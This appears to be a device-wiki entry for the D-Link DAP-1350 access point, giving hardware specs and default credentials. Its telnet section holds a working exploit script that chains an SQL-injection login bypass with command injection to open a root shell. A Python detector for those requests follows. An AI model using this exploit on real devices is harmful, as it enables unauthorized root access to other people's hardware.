D-Link DAP-1350 rev A1
D-Link DAP-1350 A1
Availability: now
Manuf (OEM/ODM): Cameo
FCC approval date: 15 September 2009
Country of manuf.: China
Type: wireless router, access point
FCC ID: KA2AP1350A1
IC ID: 4216A-AP1350
Power: 5 VDC, 2.5 A
Connector type: barrel
CPU1: Ralink RT3052 (384 MHz)
FLA1: 8 MiB (Macronix MX29LV640EBTI-70G)
RAM1: 32 MiB (ESMT M12L128168A-7T × 2)
Expansion IFs: USB 2.0
USB ports: 1
WI1 chip1: Ralink RT3052
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: none
ETH chip1: Ralink RT3052
LAN speed: 100M
LAN ports: 1
Stock FW OS: Linux
Default SSID: dlink (38 addl. devices)
Default IP address: 192.168.0.50
the IP 192.168.0.50 is used by 63 additional devices
of which 63 are D-Link devices
Default login user: admin
Default login password: blank
admin:blank credentials used by 344 additional devices
of which 180 are D-Link devices
Device | CPU1 brand | WI1 chip1 brand | WI1 chip2 brand |
---|---|---|---|
D-Link DAP-1350 rev A1 | Ralink | Ralink | |
D-Link DAP-1350 rev B1 | Ralink | Ralink | |
For a list of all currently documented Ralink chipsets with specifications, see Ralink.
Wireless N Pocket Router & Access Point
Forum threads
- OpenWRT trunk contains support for the DAP-1350; however, the 12.09-beta is broken.
- You can build your own firmware now or wait for the Attitude Adjustment release.
Enabling telnet
A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root using HTTP POST requests to a CGI program.
A secondary SQL injection vulnerability also exists allowing one to bypass HTTP authentication.
```sh
#!/bin/ksh
# DAP-1350 telnetd, by brynet.
# This affects all stock firmware images for the device.
# Tested on OpenBSD.

host=$1
if [ $# -ne 1 ]; then
	echo "usage: $0 host or ip"
	exit 1;
fi

base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\
"Host: ${host}\r\nConnection: keep-alive\r\n"\
"Content-Type: application/x-www-form-urlencoded\r\n"

# user_name=admin
# user_pwd=';select 1;--
login_cmd="request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ"
login_clen="Content-Length: $(echo -n ${login_cmd} | wc -c)\r\n\r\n"
login_req="${base_req}${login_clen}${login_cmd}"
echo $login_req | nc $host 80 | grep default > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Authenticated."
else
	echo "Failed."
	exit 1;
fi

telnetd_cmd="request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh"
telnetd_clen="Content-Length: $(echo -n ${telnetd_cmd} | wc -c)\r\n\r\n"
telnetd_req="${base_req}${telnetd_clen}${telnetd_cmd}"
echo $telnetd_req | nc $host 80 > /dev/null 2>&1
sleep 2;
nc -z $host 23 > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Root shell, okey doke."
	telnet $host
else
	echo "No root.. sorry, heh."
	exit 1;
fi
```

Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.

```
$ ./exploit.sh dlinkap # 192.168.0.50
Authenticated.
Root shell, okey doke.
Trying 192.168.0.50...
Connected to dlinkap.
Escape character is '^]'.
... motd/etc.
#
```

The factory-set root password is unknown, so no login(1) process is started. You must run the exploit script each time the device is powered on.
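A defender's view of the two requests described in this section, as an added example that is not part of the original page or of brynet's script: it flags them in captured POST traffic to the access point. It assumes POST bodies are available from a proxy or packet capture; the function names and the sample capture are constructed for illustration, and treating every `admin_webtelnet` request as alert-worthy is a policy choice made here.

```python
import base64
import re
from urllib.parse import parse_qs

# Quote, semicolon or SQL comment marker: none belongs in a login field.
SQL_META = re.compile(r"['\";]|--")

def b64_field(value):
    """Decode a base64 form field sent without '=' padding, as on this page."""
    value = value.replace(" ", "+")  # parse_qs turns a literal '+' into a space
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def classify(path, body):
    """Return findings for one POST request (request path + urlencoded body)."""
    if not path.split("?", 1)[0].endswith("/my_cgi.cgi"):
        return []
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    if form.get("request") == "login":
        for field in ("user_name", "user_pwd"):
            decoded = b64_field(form.get(field, ""))
            if decoded is None:
                findings.append(f"{field}: not valid base64")
            elif SQL_META.search(decoded):
                findings.append(f"{field}: SQL metacharacters in {decoded!r}")
    elif form.get("request") == "admin_webtelnet":
        findings.append(f"admin_webtelnet command: {form.get('cmd', '')!r}")
    return findings

# Constructed sample capture: (path, body) pairs; field values taken from this page.
SAMPLES = [
    ("/my_cgi.cgi?0.1", "request=login&user_name=YWRtaW4&user_pwd="),
    ("/my_cgi.cgi?0.2", "request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ"),
    ("/my_cgi.cgi?0.3", "request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh"),
    ("/index.html", "request=login&user_name=YWRtaW4&user_pwd="),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        for finding in classify(path, body):
            print(f"ALERT {path}: {finding}")
```

Because the login fields are base64-encoded, a signature that matches SQL characters in the raw request body would miss the injection; the fields have to be decoded before inspection.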